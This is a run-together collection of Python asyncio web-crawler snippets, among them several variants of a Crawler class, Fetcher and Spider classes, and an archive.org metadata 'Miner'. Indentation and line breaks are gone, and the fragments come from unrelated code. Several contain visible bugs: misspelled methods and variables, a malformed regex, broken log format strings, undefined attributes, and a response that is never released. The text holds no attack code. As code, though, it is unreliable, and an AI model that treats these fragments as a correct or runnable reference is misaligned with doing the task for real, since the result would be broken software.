class WebCrawler(object): def __init__(self, url, max_requests, loop, max_coroutines=100): self.url = url self.max_requests = max_requests self.links_visited = set() self.max_coroutines = max_coroutines self.queue = Queue() self.loop = loop @asyncio.coroutine def work(self): while True: url = yield from self.queue.get() fetcher = Fetcher(url, self) yield from fetcher.connect() self.queue.task_done() @asyncio.coroutine def web_crawler(self): self.queue.put_nowait(self.url) self.session = aiohttp.ClientSession(loop=self.loop) workers = [ asyncio.Task(self.work()) for _ in range(self.max_coroutines) ] yield from self.queue.join() for worker in workers: worker.cancel() yield from self.session.close()
class Fetcher: def __init__(self, loop): self.num_worker = 10 self.loop = loop self.q = Queue() self.seen_urls = set(['/']) @asyncio.coroutine def manager(self): workers = [ self.loop.create_task(self.worker()) for _ in range(self.num_worker) ] yield from self.q.put('/') # wait until q is empty yield from self.q.join() for w in workers: w.cancel() @asyncio.coroutine def worker(self): while True: url = yield from self.q.get() sock = socket.socket(socket.AF_INET) sock.setblocking(False) try: yield from self.loop.sock_connect(sock, ('dilbert.com', 80)) except BlockingIOError: pass request = 'GET {} HTTP/1.1\r\nHost: dilbert.com\r\nConnection: close\r\n\r\n'.format( url) yield from self.loop.sock_sendall(sock, request.encode('ascii')) response = b'' chunk = yield from self.loop.sock_recv(sock, 4096) while chunk: response += chunk chunk = yield from self.loop.sock_recv(sock, 4096) links = yield from self.parse_link(response) for link in links.difference(self.seen_urls): yield from self.q.put(link) self.seen_urls.update(links) self.q.task_done() sock.close() @asyncio.coroutine def parse_link(self, response): links = set([]) d = pq(response) anchors = d("a") for anchor in anchors: href = anchor.get("href") if href and href[:5] == "http:" and href[7:14] == "dilbert": links.add(href[6:]) return links
class Crawler: def __init__(self, root_url, max_redirect): self.max_tasks = 10 self.max_redirect = max_redirect self.q = Queue() self.seen_urls = set() # aiohttp's ClientSession does connection pooling and # HTTP keep-alives for us. self.session = aiohttp.ClientSession(loop=loop) # Put (URL, max_redirect) in the queue. self.q.put((root_url, self.max_redirect)) @asyncio.coroutine def crawl(self): """Run the crawler until all work is done.""" workers = [asyncio.Task(self.work()) for _ in range(self.max_tasks)] # When all work is done, exit. yield from self.q.join() for w in workers: w.cancel() @asyncio.coroutine def work(self): while True: url, max_redirect = yield from self.q.get() # Download page and add new links to self.q. yield from self.fetch(url, max_redirect) self.q.task_done() # Begin fetching http://xkcd.com/353/ fetcher = Fetcher('/353/') Task(fetcher.fetch()) loop = asyncio.get_event_loop() crawler = crawling.Crawler('http://xkcd.com', max_redirect=10) loop.run_until_complete(crawler.crawl())
class Crawler: def __init__(self, root_url, max_redirect): self.max_tasks = 10 self.max_redirect = max_redirect self.q = Queue() self.seen_urls = set() self.session = aiohttp.ClientSession(loop=loop) self.q.put((root_url, self.max_redirect)) @asyncio.coroutine def crawl(self): workers = [asyncio.Task(self.work()) for _ in range(self.max_tasks)] yield from self.q.join() for w in workers: w.cancel() @asyncio.coroutine def work(self): while True: url, max_direct = yield from self.q.get() yield from self.fetch(url, max_redirect) self.q.task_done( ) # 多线程:https://segmentfault.com/q/1010000009765115 @asyncio.coroutine def fetch(self, url, max_redirect): response = yield from self.session.get(url, allow_redirects=False) try: if is_redirect(response): if max_redirect > 0: next_url = response.headers['location'] if next_url in self.seen_urls: return self.seen_urls.add(next_url) self.q.put_nowait((next_url, max_redirect - 1)) else: links = yield from self.parse_links(response) for link in links.differenct(self.seen_urls): self.q.put_nowait((link, self.max_redirect)) self.seen_urls.update(links) finally: yield from response.release()
def worker(get, queue: asyncio.JoinableQueue, output): while True: item = yield from queue.get() # This is horrible and I feel bad for writing it, believe me try: if item is None: return chunks, id = item for i in range(id, id + chunks): try: data = yield from get("item/{}".format(i)) output(data) except Exception: pass except Exception as e: pass finally: queue.task_done()
class Spider: def __init__(self, max_tries=30, max_tasks=10, timeout=5, rootDir=os.getcwd()): self.max_tries = max_tries self.max_tasks = max_tasks self.loop = asyncio.get_event_loop() self.q = Queue(loop=self.loop) self.session = aiohttp.ClientSession(loop=self.loop) self.timeout = timeout self.rootDir = rootDir def close(self): self.session.close() def append_request(self, request): self.q.put_nowait(request) @asyncio.coroutine def _get_request(self): r = yield from self.q.get() return r @asyncio.coroutine def fetch(self, request_type, url, params, data): """Fetch one URL""" tries = 0 exception = None while tries < self.max_tries: try: print("try %s---->%d times"%(url, tries)) with aiohttp.Timeout(self.timeout): response = yield from self.session.get(url, params=params) if response.status == 200: content_type = response.headers.get('content-type') if content_type in CONTENT_TYPE_TEXT: with aiohttp.Timeout(self.timeout): content = yield from response.text(encoding='GBK') else: with aiohttp.Timeout(self.timeout): content = yield from response.read() break; except asyncio.TimeoutError: print("timeout") except aiohttp.ClientError as client_error: print("client error") except Exception: print("unknown error") tries += 1 else: print("try %s---->more than %d times, quit"%(url, tries)) return None response.release() return content @asyncio.coroutine def _work(self): """Process queue items forever.""" try: while True: r = yield from self._get_request() content = yield from self.fetch(r.request_type, r.url, r.params, r.data) if(content): r.handle_func(content) self.q.task_done() except asyncio.CancelledError: pass @asyncio.coroutine def work(self): yield from self._work() @asyncio.coroutine def spider(self): """run the spider until all finished""" workers = [asyncio.Task(self.work(),loop=self.loop) for _ in range (self.max_tasks)] yield from self.q.join() for w in workers: w.cancel()
class Crawler: def __init__(self, roots, exclude=None, strict=True, # What to crawl. max_redirect=10, max_tries=4, # Per-url limits. max_tasks=10, *, loop=None): self.loop = loop or asyncio.get_event_loop() self.roots = roots self.exclude = exclude self.strict = strict self.max_redirect = max_redirect self.max_tries = max_tries self.max_tasks = max_tasks self.q = Queue(loop=self.loop) self.seen_urls = set() self.done = [] self.session = aiohttp.ClientSession(loop=self.loop) self.root_domains = set() for root in roots: parts = urllib.parse.urlparse(root) host, port = urllib.parse.splitport(parts.netloc) if not host: continue if re.match(r'\A[\d\.]*\Z', host): self.root_domains.add(host) else: host = host.lower() if self.strict: self.root_domains.add(host) else: self.root_domains.add(lenient_host(host)) for root in roots: self.add_url(root) self.t0 = time.time() self.t1 = None def close(self): self.session.close() def host_okay(self, host): host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False if self.strict: return self._host_okay_strictish(host) else: return self._host_okay_lenient(host) def _host_okay_strictish(self, host): host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def _host_okay_lenient(self, host): return lenient_host(host) in self.root_domains def record_statistic(self, fetch_statistic): self.done.append(fetch_statistic) @asyncio.coroutine def parse_links(self, response): links = set() content_type = None encoding = None body = yield from response.read() if response.status == 200: content_type = response.headers.get('content-type') pdict = {} if content_type: content_type, pdict = cgi.parse_header(content_type) encoding = pdict.get('charset', 'utf-8') if content_type in ('text/html', 'application/xml'): text = yield from response.text() # Replace href with (?:href|src) to follow image links. urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text)) if urls: LOGGER.info('got %r distinct urls from %r', len(urls), response.url) for url in urls: normalized = urllib.parse.urljoin(response.url, url) defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) stat = FetchStatistic( url=response.url, next_url=None, status=response.status, exception=None, size=len(body), content_type=content_type, encoding=encoding, num_urls=len(links), num_new_urls=len(links - self.seen_urls)) return stat, links @asyncio.coroutine def fetch(self, url, max_redirect): tries = 0 exception = None while tries < self.max_tries: try: response = yield from self.session.get( url, allow_redirects=False) if tries > 1: LOGGER.info('try %r for %r success', tries, url) break except aiohttp.ClientError as client_error: LOGGER.info('try %r for %r raised %r', tries, url, client_error) exception = client_error tries += 1 else: # We never broke out of the loop: all tries failed. LOGGER.error('%r failed after %r tries', url, self.max_tries) self.record_statistic(FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) return try: if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) self.record_statistic(FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) if next_url in self.seen_urls: return if max_redirect > 0: LOGGER.info('redirect to %r from %r', next_url, url) self.add_url(next_url, max_redirect - 1) else: LOGGER.error('redirect limit reached for %r from %r', next_url, url) else: stat, links = yield from self.parse_links(response) self.record_statistic(stat) for link in links.difference(self.seen_urls): self.q.put_nowait((link, self.max_redirect)) self.seen_urls.update(links) finally: yield from response.release() @asyncio.coroutine def work(self): # Process queue items forever. try: while True: url, max_redirect = yield from self.q.get() assert url in self.seen_urls yield from self.fetch(url, max_redirect) self.q.task_done() except asyncio.CancelledError: pass def url_allowed(self, url): if self.exclude and re.search(self.exclude, url): return False parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): LOGGER.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay(host): LOGGER.debug('skipping non-root host in %r', url) return False return True def add_url(self, url, max_redirect=None): # Add a URL to the queue if not seen before. if max_redirect is None: max_redirect = self.max_redirect LOGGER.debug('adding %r %r', url, max_redirect) self.seen_urls.add(url) self.q.put_nowait((url, max_redirect)) @asyncio.coroutine def crawl(self): # Run the crawler until all finished. workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)] self.t0 = time.time() yield from self.q.join() self.t1 = time.time() for w in workers: w.cancel()
class Crawler: def __init__(self, roots, exclude=None, strict=True, max_redirect=10, max_tries=4, max_tasks=10, *, loop=None): self.loop = loop or asyncio.get_event_loop() self.roots = roots self.exclude = exclude self.strict = strict self.max_redirect = max_redirect self.max_tries = max_tries self.max_tasks = max_tasks self.q = Queue(loop=self.loop) self.seen_urls = set() self.done = [] self.session = aiohttp.ClientSession(loop=self.loop) self.root_domains = set() for root in roots: parts = urllib.parse.urlparse(root) host, port = urllib.parse.splitport(parts.netloc) if not host: continue if re.match(r'\A[\d\.]*\Z]', host): self.root_domains.add(host) else: host = host.lower() if self.strict: self.root_domains.add(host) else: self.root_domains.add(lenient_host(host)) for root in roots: self.add_url(root) self.t0 = time.time() self.t1 = None def close(self): self.session.close() def host_okay(self, host): host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False if self.strict: return self._host_okay_strictish(host) else: return self._host_okay_lenient(host) def _host_okay_strictish(self, host): host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def _host_okay_lenient(self, host): return lenient_host(host) in self.root_domains def record_statistic(self, fetch_statistic): self.done.append(fetch_statistic) @asyncio.coroutine def parse_links(self, response): links = set() content_type = None encoding = None body = yield from response.read() if response.status == 200: content_type = response.headers.get('content-type') pdict = {} if content_type: content_type, pdict = cgi.parse_header(content_type) encoding = pdict.get('charset', 'utf-8') if content_type in ('text/html', 'application/xml'): text = yield from response.text() urls = set(re.findall(r"""(?i)href=["']?([^\s"'<>]+)""", text)) if urls: logger.info('got %r distinct urls from %r', len(urls), response.url) for url in urls: normalized = urllib.parse.urljoin(response.url, url) defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) stats = FetchStatistic(url=response.url, next_url=None, status=response.status, exception=None, size=len(body), content_type=content_type, encoding=encoding, num_urls=len(links), num_new_urls=len(links - self.seen_urls)) return stats, links @asyncio.coroutine def fetch(self, url, max_redirect): tries = 0 exception = None while tries < self.max_tries: try: response = yield from self.session.get(url, allow_redirects=False) if tries > 1: logger.info('try %r for % success', tries, url) break except aiohttp.ClientError as client_error: logger.info('try %r for %r raised %r', tries, url, client_error) exception = client_error tries += 1 else: logger.error('%r failed after %r tries', url, self.max_tries) self.record_statistic(FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) return try: if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) self.record_statistic( FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) if next_url in self.seen_urls: return if max_redirect > 0: logger.info('redirect to %r from %r', next_url, url) self.add_url(next_url, max_redirect - 1) else: logger.error('redirect limit reached for &r from %r', next_url, url) else: stat, links = yield from self.parse_links(response) self.record_statistic(stat) for link in links.difference(self.seen_urls): self.q.put_nowait((link, self.max_redirect)) self.seen_urls.update(links) finally: pass @asyncio.coroutine def work(self): try: while True: url, max_redirect = yield from self.q.get() assert url in self.seen_urls yield from self.fetch(url, max_redirect) self.q.task_done() except asyncio.CancelledError: pass def url_allowed(self, url): if self.exclude and re.search(self.exclude, url): return False parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): logger.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay(host): logger.debug('skipping non-root host in %r', url) return False return True def add_url(self, url, max_redirect=None): if max_redirect is None: max_redirect = self.max_redirect logger.debug('adding %r %r', url, max_redirect) self.seen_urls.add(url) self.q.put_nowait((url, max_redirect)) def crawl(self): workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)] self.t0 = time.time() yield from self.q.join() self.t1 = time.time() for w in workers: w.cancel()
class Fetcher(object): """ Async Page fetcher, that c """ def __init__(self, max_tasks=20): self.max_tasks = max_tasks self.max_redirect = max_redirect self.q = Queue() # aiohttp's ClientSession does connection pooling and # HTTP keep-alives for us. loop = asyncio.get_event_loop() loop.run_until_complete(self.fetch()) self.session = aiohttp.ClientSession(loop=loop) @asyncio.coroutine def fetch(self): """ Run the fetcher until all work is done. """ # Create workers that fetch pages workers = [asyncio.Task(self.work()) for _ in range(self.max_tasks / 2)] # Create seeders that takes URLs from redis and adds it to own queue seeders = [asyncio.Task(self.get_seeds()) for _ in range(self.max_tasks / 2)] # When all work is done, exit. yield from self.q.join() for s in seeders: s.cancel() for w in workers: w.cancel() @asyncio.coroutine def work(self): while True: # Get URLs from own queue url = yield from self.q.get() # Download page yield from self.fetch_url(url) self.q.task_done() @asyncio.coroutine def fetch_url(self, url): # Handle redirects ourselves. response = yield from self.session.get( url, allow_redirects=True) try: # Handle the reponse pass finally: # Return connection to pool. yield from response.release() @asyncio.coroutine def get_seeds(self): while True: pass
class Crawler: """Crawl a set of URLs. This manages two sets of URLs: 'urls' and 'done'. 'urls' is a set of URLs seen, and 'done' is a list of FetchStatistics. """ def __init__(self, roots, exclude=None, strict=True, # What to crawl. max_redirect=10, max_tries=4, # Per-url limits. max_tasks=10, *, loop=None): # The lone * indicates that all following arguments are keyword-only arguments self.loop = loop or asyncio.get_event_loop() self.roots = roots self.exclude = exclude self.strict = strict self.max_redirect = max_redirect self.max_tries = max_tries self.max_tasks = max_tasks self.q = Queue(loop=self.loop) self.seen_urls = set() self.done = [] self.session = aiohttp.ClientSession(loop=self.loop) self.root_domains = set() for root in roots: parts = urllib.parse.urlparse(root) host, port = urllib.parse.splitport(parts.netloc) if not host: continue if re.match(r'\A[\d\.]*\Z', host): # \A and \Z are similar to ^ and $, \d represents the digital.(0.0.0.0) self.root_domains.add(host) else: host = host.lower() if self.strict: self.root_domains.add(host) else: self.root_domains.add(lenient_host(host)) for root in roots: self.add_url(root) self.t0 = time.time() self.t1 = None def close(self): """Close resources.""" self.session.close() def host_okay(self, host): """Check if a host should be crawled. A literal match (after lowercasing) is always good. For hosts that don't look like IP addresses, some approximate matches are okay depending on the strict flag. """ host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False if self.strict: return self._host_okay_strictish(host) else: return self._host_okay_lenient(host) def _host_okay_strictish(self, host): """Check if a host should be crawled, strict-ish version. This checks for equality modulo an initial 'www.' component. """ host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def _host_okay_lenient(self, host): """Check if a host should be crawled, lenient version. This compares the last two components of the host. """ return lenient_host(host) in self.root_domains def record_statistic(self, fetch_statistic): """Record the FetchStatistic for completed / failed URL.""" self.done.append(fetch_statistic) @asyncio.coroutine def parse_links(self, response): """Return a FetchStatistic and list of links.""" links = set() content_type = None encoding = None body = yield from response.read() if response.status == 200: content_type = response.headers.get('content-type') pdict = {} if content_type: content_type, pdict = cgi.parse_header(content_type) encoding = pdict.get('charset', 'utf-8') if content_type in ('text/html', 'application/xml'): text = yield from response.text() urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text)) if urls: LOGGER.info('got %r distinct urls from %r', len(urls), response.url) for url in urls: normalized = urllib.parse.urljoin(response.url, url) defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) stat = FetchStatistic( url=response.url, next_url=None, status=response.status, exception=None, size=len(body), content_type=content_type, encoding=encoding, num_urls=len(links), num_new_urls=len(links - self.seen_urls)) return stat, links @asyncio.coroutine def fetch(self, url, max_redirect): """Fetch one URL.""" tries = 0 exception = None while tries < self.max_tries: try: response = yield from self.session.get( url, allow_redirects=False) if tries > 1: LOGGER.info('try %r for %r success', tries, url) break except aiohttp.ClientError as client_error: LOGGER.info('try %r for %r raised %r', tries, url, client_error) exception = client_error tries += 1 else: # We never broke out of the loop: all tries failed. LOGGER.error('%r failed after %r tries', url, self.max_tries) self.record_statistic(FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) return try: if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) self.record_statistic(FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) if next_url in self.seen_urls: return if max_redirect > 0: LOGGER.info('redirect to %r from %r', next_url, url) self.add_url(next_url, max_redirect - 1) else: LOGGER.error('redirect limit reached for %r from %r', next_url, url) else: stat, links = yield from self.parse_links(response) self.record_statistic(stat) for link in links.difference(self.seen_urls): self.q.put_nowait((link, self.max_redirect)) self.seen_urls.update(links) finally: yield from response.release() @asyncio.coroutine def work(self): """Process queue items forever.""" try: while True: url, max_redirect = yield from self.q.get() assert url in self.seen_urls yield from self.fetch(url, max_redirect) self.q.task_done() except asyncio.CancelledError: pass def url_allowed(self, url): if self.exclude and re.search(self.exclude, url): return False parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): LOGGER.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay(host): LOGGER.debug('skipping non-root host in %r', url) return False return True def add_url(self, url, max_redirect=None): """Add a URL to the queue if not seen before.""" if max_redirect is None: max_redirect = self.max_redirect LOGGER.debug('adding %r %r', url, max_redirect) self.seen_urls.add(url) self.q.put_nowait((url, max_redirect)) @asyncio.coroutine def crawl(self): """Run the crawler until all finished.""" workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)] self.t0 = time.time() yield from self.q.join() self.t1 = time.time() for w in workers: w.cancel()
class Miner(object): def __init__(self, loop=None, max_tasks=None, retries=None, secure=None, hosts=None, params=None, config=None, config_file=None, access=None, secret=None, debug=None): # Set default values for kwargs. loop = asyncio.get_event_loop() if not loop else loop max_tasks = 100 if not max_tasks else max_tasks max_retries = 10 if not retries else retries protocol = 'http://' if not secure else 'https://' config = get_config(config, config_file) access = config.get('s3', {}).get('access', access) secret = config.get('s3', {}).get('secret', secret) debug = True if debug else False self.max_tasks = max_tasks self.max_retries = max_retries self.protocol = protocol self.hosts = hosts self.config = config self.access = access self.debug = debug self.cookies = config.get('cookies', {}) # Asyncio/Aiohttp settings. self.connector = aiohttp.TCPConnector(share_cookies=True, loop=loop) self.connector.update_cookies(self.cookies) self.loop = loop self.q = Queue(1000, loop=self.loop) self.q = Queue(loop=self.loop) # Require valid access key! self.assert_s3_keys_valid(access, secret) # Rate limiting. self._max_per_second = self.get_global_rate_limit() self._min_interval = 1.0 / float(self._max_per_second) self._last_time_called = 0.0 def close(self): self.connector.close() self.loop.stop() self.loop.close() def assert_s3_keys_valid(self, access, secret): url = '{}s3.us.archive.org?check_auth=1'.format(self.protocol) r = urllib.request.Request(url) r.add_header('Authorization', 'LOW {0}:{1}'.format(access, secret)) f = urllib.request.urlopen(r) j = json.loads(f.read().decode('utf-8')) if j.get('authorized') is not True: raise AuthenticationError(j.get('error')) def get_global_rate_limit(self): """Get the global rate limit per client. :rtype: int :returns: The global rate limit for each client. """ r = urllib.request.urlopen('https://archive.org/metadata/iamine-rate-limiter') j = json.loads(r.read().decode('utf-8')) return int(j.get('metadata', {}).get('rate_per_second', 300)) def _rate_limited(): """A rate limit decorator for limiting the number of times the decorated :class:`Miner` method can be called. Limits are set in :attr:`Miner._max_per_second`. """ def decorate(func): def rate_limited_func(self, *args, **kwargs): elapsed = time.monotonic() - self._last_time_called self.left_to_wait = self._min_interval - elapsed if self.left_to_wait > 0: time.sleep(self.left_to_wait) func(self, *args, **kwargs) self._last_time_called = time.monotonic() yield from func(self, *args, **kwargs) return rate_limited_func return decorate @_rate_limited() def make_rate_limited_request(self, request): yield from request.make_request() @asyncio.coroutine def work(self): while True: request = yield from self.q.get() yield from self.make_rate_limited_request(request) self.q.task_done() @asyncio.coroutine def q_requests(self, requests): for req in requests: self.q.put_nowait(req) @asyncio.coroutine def mine(self, requests): workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)] yield from self.q_requests(requests) yield from self.q.join() yield from asyncio.sleep(1) while not self.q.empty(): yield from asyncio.sleep(1) for w in workers: w.cancel() yield from asyncio.sleep(.5)
class SearchMiner(ItemMiner): def __init__(self, **kwargs): super(SearchMiner, self).__init__(**kwargs) # Item mining queue. self.iq = Queue(1000, loop=self.loop) def get_search_params(self, query, params): default_rows = 500 search_params = { 'q': 'all:1', 'page': 1, 'output': 'json', } if params: search_params.update({k: v for k, v in params.items() if v}) if query: search_params['q'] = query if 'rows' not in search_params: search_params['rows'] = default_rows return search_params def get_search_info(self, params): url = make_url('/advancedsearch.php?', self.protocol, self.hosts) p = deepcopy(params) p['rows'] = 0 params = urllib.parse.urlencode(p) url += params f = urllib.request.urlopen(url) return json.loads(f.read().decode('utf-8')) @asyncio.coroutine def _handle_search_results(self, resp, params=None, callback=None): j = yield from resp.json(encoding='utf-8') resp.close() identifiers = [] for doc in j.get('response', {}).get('docs', []): if not doc.get('identifier'): continue identifiers.append(doc['identifier']) for req in metadata_requests(identifiers, params, callback, self): self.iq.put_nowait(req) def search_requests(self, query=None, params=None, callback=None, mine_ids=None): """Mine Archive.org search results. :param query: The Archive.org search query to yield results for. Refer to https://archive.org/advancedsearch.php#raw for help formatting your query. :type query: str :param params: The URL parameters to send with each request sent to the Archive.org Advancedsearch Api. :type params: dict """ # If mining ids, devote half the workers to search and half to item mining. if mine_ids: self.max_tasks = self.max_tasks/2 # When mining id's, the only field we need returned is "identifier". if mine_ids and params: params = dict((k, v) for k, v in params.items() if 'fl' not in k) params['fl[]'] = 'identifier' # Make sure "identifier" is always returned in search results. fields = [k for k in params if 'fl' in k] if (len(fields) == 1) and (not any('identifier' == params[k] for k in params)): # Make sure to not overwrite the existing fl[] key. i = 0 while params.get('fl[{}]'.format(i)): i += 1 params['fl[{}]'.format(i)] = 'identifier' search_params = self.get_search_params(query, params) url = make_url('/advancedsearch.php', self.protocol, self.hosts) search_info = self.get_search_info(search_params) total_results = search_info.get('response', {}).get('numFound', 0) total_pages = (int(total_results/search_params['rows']) + 1) for page in range(1, (total_pages + 1)): params = deepcopy(search_params) params['page'] = page if not callback and mine_ids: callback = self._handle_search_results req = MineRequest('GET', url, self.access, callback=callback, max_retries=self.max_retries, debug=self.debug, params=params, connector=self.connector) yield req @asyncio.coroutine def mine_items(self): while True: request = yield from self.iq.get() yield from self.make_rate_limited_request(request) self.iq.task_done() @asyncio.coroutine def search(self, query=None, params=None, callback=None, mine_ids=None): search_requests = self.search_requests(query, params, callback, mine_ids) if mine_ids: workers = [asyncio.Task(self.mine_items(), loop=self.loop) for _ in range(self.max_tasks)] yield from self.mine(search_requests) # Wait a bit for all connections to close. yield from asyncio.sleep(1) if mine_ids: for w in workers: w.cancel()
class Crawler: """Crawl a set of URLs. This manages two sets of URLs: 'urls' and 'done'. 'urls' is a set of URLs seen, and 'done' is a list of FetchStatistics. """ def __init__(self, roots, exclude=None, strict=True, # What to crawl. max_redirect=10, max_tries=4, # Per-url limits. max_tasks=10, loop=None): get_domain(roots) if not os.path.exists(os.path.dirname(path)): os.makedirs(os.path.dirname(path)) with open(path, 'w') as temp_file: print('writing') temp_file.write('Domain name:') temp_file.write(roots) temp_file.write('\n \n') temp_file.close() self.loop = loop or asyncio.get_event_loop() self.roots = roots self.exclude = exclude self.strict = strict self.max_redirect = max_redirect self.max_tries = max_tries self.max_tasks = max_tasks self.q = Queue(loop=self.loop) self.seen_urls = set() self.done = [] self.connector = aiohttp.TCPConnector(loop=self.loop) self.root_domains = set() # for root in roots: # parts = urllib.parse.urlparse(root) # host, port = urllib.parse.splitport(parts.netloc) # if not host: # continue # if re.match(r'\A[\d\.]*\Z', host): # self.root_domains.add(host) # else: ## host = host.lower() # if self.strict: # self.root_domains.add(host) # else: # self.root_domains.add(lenient_host(host)) # for root in roots: # print("true root") # print(root) # self.add_url(root) self.add_url(roots) self.t0 = time.time() self.t1 = None def close(self): """Close resources.""" self.connector.close() def host_okay(self, host): """Check if a host should be crawled. A literal match (after lowercasing) is always good. For hosts that don't look like IP addresses, some approximate matches are okay depending on the strict flag. """ host = host.lower() if host in self.root_domains: return True if re.match(r'\A[\d\.]*\Z', host): return False if self.strict: return self._host_okay_strictish(host) else: return self._host_okay_lenient(host) def _host_okay_strictish(self, host): """Check if a host should be crawled, strict-ish version. This checks for equality modulo an initial 'www.' component. """ host = host[4:] if host.startswith('www.') else 'www.' + host return host in self.root_domains def _host_okay_lenient(self, host): """Check if a host should be crawled, lenient version. This compares the last two components of the host. """ return lenient_host(host) in self.root_domains def record_statistic(self, fetch_statistic): """Record the FetchStatistic for completed / failed URL.""" self.done.append(fetch_statistic) @asyncio.coroutine def parse_links(self, response): """Return a FetchStatistic and list of links.""" links = set() content_type = None encoding = None body = yield from response.read() if response.status == 200: content_type = response.headers.get('content-type') pdict = {} if content_type: content_type, pdict = cgi.parse_header(content_type) encoding = pdict.get('charset', 'utf-8') if content_type in ('text/html', 'application/xml'): text = yield from response.text() #Mick - raw HTML page #print(text) # Replace href with (?:href|src) to follow image links. urls = set(re.findall(r'''(?i)href=["']?([^\s"'<>]+)''', text)) if urls: LOGGER.info('got %r distinct urls from %r', len(urls), response.url) for url in urls: #if(url.find("/ibm/console/logon.jsp?action=OK"): # print("There is a login page") normalized = urllib.parse.urljoin(response.url, url) # path = get_domain(str(normalized)) with open(path, 'a') as temp_file: temp_file.write(str(normalized) + ',\n') temp_file.close() defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) stat = FetchStatistic( url=response.url, next_url=None, status=response.status, exception=None, size=len(body), content_type=content_type, encoding=encoding, num_urls=len(links), num_new_urls=len(links - self.seen_urls)) return stat, links @asyncio.coroutine def fetch(self, url, max_redirect): """Fetch one URL.""" tries = 0 exception = None while tries < self.max_tries: try: response = yield from aiohttp.request( 'get', url, connector=self.connector, allow_redirects=False, loop=self.loop) if tries > 1: LOGGER.info('try %r for %r success', tries, url) break except aiohttp.ClientError as client_error: LOGGER.info('try %r for %r raised %r', tries, url, client_error) exception = client_error tries += 1 else: # We never broke out of the loop: all tries failed. LOGGER.error('%r failed after %r tries', url, self.max_tries) self.record_statistic(FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) return if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) self.record_statistic(FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) if next_url in self.seen_urls: return if max_redirect > 0: LOGGER.info('redirect to %r from %r', next_url, url) self.add_url(next_url, max_redirect - 1) else: LOGGER.error('redirect limit reached for %r from %r', next_url, url) else: stat, links = yield from self.parse_links(response) self.record_statistic(stat) for link in links.difference(self.seen_urls): self.q.put_nowait((link, self.max_redirect)) self.seen_urls.update(links) @asyncio.coroutine def work(self): """Process queue items forever.""" while True: url, max_redirect = yield from self.q.get() assert url in self.seen_urls yield from self.fetch(url, max_redirect) self.q.task_done() def url_allowed(self, url): if self.exclude and re.search(self.exclude, url): return False parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): LOGGER.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay(host): LOGGER.debug('skipping non-root host in %r', url) return False return True def add_url(self, url, max_redirect=None): """Add a URL to the queue if not seen before.""" if max_redirect is None: max_redirect = self.max_redirect LOGGER.debug('adding %r %r', url, max_redirect) #TODO Mick - getting a new URL #print("new url: ") #print(url) # path = get_domain(url) # with open(path, 'w') as temp_file: # print('writing') # temp_file.write('Domain name:') # temp_file.write(url) # temp_file.write('\n \n') # temp_file.close() self.seen_urls.add(url) self.q.put_nowait((url, max_redirect)) @asyncio.coroutine def crawl(self): print("crawling...") """Run the crawler until all finished.""" workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)] self.t0 = time.time() yield from self.q.join() assert self.seen_urls == set(stat.url for stat in self.done) self.t1 = time.time() for w in workers: w.cancel()
